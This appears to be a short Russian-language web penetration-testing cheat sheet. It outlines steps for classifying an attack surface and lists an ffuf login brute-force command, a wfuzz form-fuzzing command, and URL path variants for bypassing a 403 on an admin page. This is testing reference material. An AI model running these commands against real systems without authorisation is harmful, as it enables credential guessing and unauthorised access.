Веб
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Классифицируйте поверхность атаки (веб‑приложение, API, админка).
- Выберите раздел по типу уязвимости и следуйте его логике.
- Сочетайте ручной анализ и инструментальные проверки; сохраняйте артефакты для отчёта.
- Технические примеры внизу страницы — на языке оригинала.
Методика
Form fuzzing
ffuf -w "./usuarios.txt:USERS" -w "./wordlist.txt:PASSWDS" -t 60 -u http://<URL>/login -H "Content-Type: application/json;charset=utf-8" -X POST -d '{"username":"USERS","password":"PASSWDS"}'
wfuzz -u http://<URL>/search -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d 'name=FUZZ' -z file,/usr/share/wordlists/SecLists/Fuzzing/special-chars.txt,urlencode
Bypass Forbidden
GET /admin ==> 403 Forbidden
GET /blablabal/%2e%2e/admin ==> 200 OK
GET /blablabal/..;/admin ==> 200 OK
GET /blablabal/;/admin ==> 200 OK
GET /blablabal/admin/..;/ ==> 200 OK
GET /admin?access=1 ==> 200 OK